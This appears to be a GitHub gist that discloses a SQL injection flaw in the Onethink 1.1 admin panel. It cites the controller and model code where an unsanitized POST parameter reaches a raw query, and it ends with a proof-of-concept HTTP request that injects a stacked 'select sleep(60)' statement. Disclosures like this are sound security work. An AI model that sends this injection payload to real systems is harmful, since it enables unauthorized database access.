Skip to content

Instantly share code, notes, and snippets.

@LioTree
Last active April 28, 2024 09:09
Show Gist options
  • Save LioTree/1971a489dd5ff619b89e7a9e1da91152 to your computer and use it in GitHub Desktop.
Save LioTree/1971a489dd5ff619b89e7a9e1da91152 to your computer and use it in GitHub Desktop.
SQLi vulnerability in onethink

A SQL injection vulnerability in Onethink 1.1

In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Controller/ModelController.class.php#L148, $table is controlled by users.

$table = I('post.table');
empty($table) && $this->error('请选择要生成的数据表!');
$res = D('Model')->generate($table,I('post.name'),I('post.title'));

In https://github.com/liu21st/onethink/blob/f705308bc24611af650e6830e3be2a07dd8bb823/wwwroot/Application/Admin/Model/ModelModel.class.php#L122, $table is inserted into SQL directly.

public function generate($table,$name='',$title=''){
        // ......
        $fields = M()->query('SHOW FULL COLUMNS FROM '.$table);
        //......
}

POC:

POST /admin.php?s=/Model/generate.html HTTP/1.1
Host: www.myonethink.com
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://www.myonethink.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myonethink.com/admin.php?s=/Model/generate.html
Cookie: PHPSESSID=l7mt7mtb5sr16frdpv6fqibith; onethink_admin___forward__=%2Fadmin.php%3Fs%3D%2FModel%2Findex.html

table=onethink_action;select%20sleep(60)&name=test2&title=test2&id=

图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment